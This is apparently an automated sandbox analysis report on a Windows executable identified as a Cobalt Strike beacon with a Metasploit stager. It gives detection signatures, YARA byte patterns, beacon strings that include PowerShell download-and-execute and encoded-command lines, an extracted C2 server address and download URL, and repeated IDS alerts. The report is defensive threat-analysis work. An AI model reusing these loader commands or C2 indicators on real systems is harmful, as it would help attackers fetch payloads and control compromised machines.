Windows Analysis Report
7kSftA4Eoh.exe

Overview

General Information

Sample name: 7kSftA4Eoh.exe
renamed because original name is a hash value
Original sample name: 71f8b8789a4b0ac3f057f1468579fc23.exe
Analysis ID: 1523188
MD5: 71f8b8789a4b0ac3f057f1468579fc23
SHA1: 2f424692dcfb5f9fe87f1e94fd2922ab3fb2143d
SHA256: a390b03e67b809b3dd08b840e3e917eb701387309c5a8859438dc926ce62ec64
Tags: CobaltStrike, exe, user-abuse_ch

Detection

CobaltStrike, Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Metasploit Payload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 7kSftA4Eoh.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\7kSftA4Eoh.exe" MD5: 71F8B8789A4B0AC3F057F1468579FC23)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://8.130.42.227:10001/2yMe", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\r\n"}
{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\r\n", "Type": "Metasploit Download", "URL": "http://8.130.42.227/2yMe"}
Source | Rule | Description | Author | Strings
00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_b54b94ac | Rule for beacon sleep obfuscation routine | unknown
  • 0x137:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown
  • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
Source | Rule | Description | Author | Strings
0.2.7kSftA4Eoh.exe.990000.1.raw.unpack | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
0.2.7kSftA4Eoh.exe.990000.1.raw.unpack | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
0.2.7kSftA4Eoh.exe.990000.1.raw.unpack | Windows_Trojan_CobaltStrike_ee756db7 | Attempts to detect Cobalt Strike based on strings found in BEACON | unknown
  • 0x2e9a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x2ea1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x2f185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
  • 0x2f4b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
  • 0x2f449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x2f4b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x2ea7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x2ec0f:$a7: could not run command (w/ token) because of its length of %d bytes!
  • 0x2eac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x2eb02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
  • 0x2f501:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
  • 0x2ed6f:$a11: Could not open service control manager on %s: %d
  • 0x2f2a1:$a12: %d is an x64 process (can't inject x86 content)
  • 0x2f2d1:$a13: %d is an x86 process (can't inject x64 content)
  • 0x2f5f2:$a14: Failed to impersonate logged on user %d (%u)
  • 0x2f25a:$a15: could not create remote thread in %d: %d
  • 0x2eb38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x2f208:$a17: could not write to process memory: %d
  • 0x2eda0:$a18: Could not create service %s on %s: %d
  • 0x2ee29:$a19: Could not delete service %s on %s: %d
  • 0x2ec89:$a20: Could not open process token: %d (%u)
0.2.7kSftA4Eoh.exe.990000.1.raw.unpack | Windows_Trojan_CobaltStrike_663fc95d | Identifies CobaltStrike via unidentified function code | unknown
  • 0x1a1f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.7kSftA4Eoh.exe.990000.1.raw.unpack | Windows_Trojan_CobaltStrike_f0b627fc | Rule for beacon reflective loader | unknown
  • 0x17ad2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
  • 0x18d83:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
            No Sigma rule has matched
            2024-10-01T09:20:57.479719+020020337131Targeted Malicious Activity was Detected192.168.2.4499368.130.42.22710001TCP
            2024-10-01T09:20:58.539468+020020337131Targeted Malicious Activity was Detected192.168.2.4499378.130.42.22710001TCP
            2024-10-01T09:20:59.608844+020020337131Targeted Malicious Activity was Detected192.168.2.4499388.130.42.22710001TCP
            2024-10-01T09:21:00.694909+020020337131Targeted Malicious Activity was Detected192.168.2.4499398.130.42.22710001TCP
            2024-10-01T09:21:01.773785+020020337131Targeted Malicious Activity was Detected192.168.2.4499408.130.42.22710001TCP
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-10-01T09:16:59.037379+0200 | 2035442 | 1 | A Network Trojan was detected | 8.130.42.227 | 10001 | 192.168.2.4 | 49730 | TCP

            AV Detection

            Source: 7kSftA4Eoh.exe, Avira: detected
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: CobaltStrike {"C2Server": "http://8.130.42.227:10001/2yMe", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\r\n"}
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\r\n", "Type": "Metasploit Download", "URL": "http://8.130.42.227/2yMe"}
            Source: http://8.130.42.227:10001/2yMe, Virustotal: Detection: 6%
            Source: 7kSftA4Eoh.exe, ReversingLabs: Detection: 89%
            Source: 7kSftA4Eoh.exe, Virustotal: Detection: 79%
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: 7kSftA4Eoh.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_00991184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00991184
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009BE020 CryptGenRandom,0_2_009BE020

            Compliance

            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Unpacked PE file: 0.2.7kSftA4Eoh.exe.990000.1.unpack
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009A0ED4 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_009A0ED4
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009A779C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_009A779C

            Networking

            Source: Network traffic, Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 8.130.42.227:10001
            Source: Network traffic, Suricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 8.130.42.227:10001 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49804 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49800 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49807 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49749 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49818 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49760 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49742 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49827 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49770 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49782 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49823 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49836 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49844 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49832 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49820 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49786 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49797 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49819 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49773 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49775 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49794 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49816 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49774 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49843 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49795 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49839 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49747 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49785 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49817 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49833 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49838 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49848 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49828 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49851 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49845 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49841 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49863 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49799 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49771 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49859 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49873 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49865 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49867 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49847 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49834 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49876 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49879 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49821 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49871 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49883 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49878 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49805 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49882 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49855 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49768 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49875 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49868 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49789 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49790 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49885 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49856 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49784 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49857 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49894 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49881 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49860 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49783 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49777 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49904 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49753 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49884 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49803 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49903 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49922 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49787 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49895 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49917 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49835 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49840 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49887 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49810 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49909 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49788 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49900 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49870 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49866 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49933 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49796 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49921 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49888 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49891 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49905 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49877 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49902 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49874 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49814 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49912 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49940 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49862 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49766 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49822 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49809 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49890 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49852 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49914 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49808 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49936 -> 8.130.42.227:10001
